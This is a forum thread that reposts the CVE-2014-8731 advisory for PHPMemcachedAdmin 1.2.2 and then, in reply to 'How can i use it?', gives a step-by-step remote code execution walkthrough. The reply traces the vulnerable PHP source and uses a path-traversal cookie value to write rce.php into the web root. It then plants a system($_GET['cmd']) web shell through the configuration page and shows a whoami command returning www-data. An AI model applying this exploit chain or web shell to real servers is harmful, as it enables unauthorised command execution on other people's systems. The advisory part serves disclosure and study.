Jump to content
akkiliON

PHPMemcachedAdmin 1.2.2 Remote Code Execution

Recommended Posts

  • Active Members


CVE-2014-8731
CVSSv2 Vector:
[AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C]
CVSSv2 Base Score=10.0
CVSSv2 Temp Score=9.5
OWASP Top 10 classification: A1 - Injection

PHPMemcachedAdmin is a web-based frontend for Linux's memcached Daemon.

Project Homepage:
https://code.google.com/p/phpmemcacheadmin/
Download Site:
http://blog.elijaa.org/index.php?pages/phpMemcachedAdmin-Download

PHPMemcachedAdmin stores data in the server's filesystem.
Part of the serialized data and the last part of the concatenated filename may be specified by the user, which can lead to remote code execution e.g. if a php script is created and placed within the webserver's document root.

All versions prior and including the current version 1.2.2 are affected as far as we know.

Surs?: PHPMemcachedAdmin 1.2.2 Remote Code Execution ? Packet Storm

Link to comment
Share on other sites

How can i use it?

It is not an exploit, it is an advisory (few details are published at the moment). However, we can check for ourselves:

Let's take a look at stats.php:


if(!isset($_COOKIE['live_stats_id' . $hash]))
{
...
}
else
{
# Backup from a previous request
$live_stats_id = $_COOKIE['live_stats_id' . $hash];
}

If the

'live_stats_id' . $hash

cookie is not set, it is created (with values that we can change). Take a look here:

$hash is:


$hash = md5($_GET['cluster']);

and cluster is a variable that we can simply set via a GET request:


if(isset($_GET['cluster']) && ($_GET['cluster'] != null)){ $cluster = $_GET['cluster'];}

So, if we set the $cluster variable to test, the cookie name should become:

live_stats_id098f6bcd4621d373cade4e832627b4f6

The we can see that the $live_stats_id variable, which can be controlled by us, is concatenated to the end of the $file_path variable:


$file_path = rtrim($_ini->get('file_path'), '/') . DIRECTORY_SEPARATOR . 'live_stats.' . $live_stats_id;

The $file_path variable will become:

Temp/live_stats.1022488408098f6bcd4621d373cade4e832627b4f6

We can change the cookie value to "/../../rce.php", so $file_path will become:

Temp/live_stats./../../rce.php

Then we can see that a file called rce.php has been created in the root directory.

Now we must write code that allows us to execute commands. We go to "Edit configuration" (http://127.0.0.1/configure.php) and set this code as the hostname (of course, you can use any PHP code you want):


<?php system($_GET['cmd']);?>

Then save the configuration. Now all you have to execute your command (example):

http://127.0.0.1/rce.php?cmd=whoami

And you'll get:

a:1:{s:33:"[COLOR=#ff0000][B]www-data[/B][/COLOR] :123";a:1:{s:10:"query_time";i:1;}}

Have fun, I hope you learned something. :-)

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...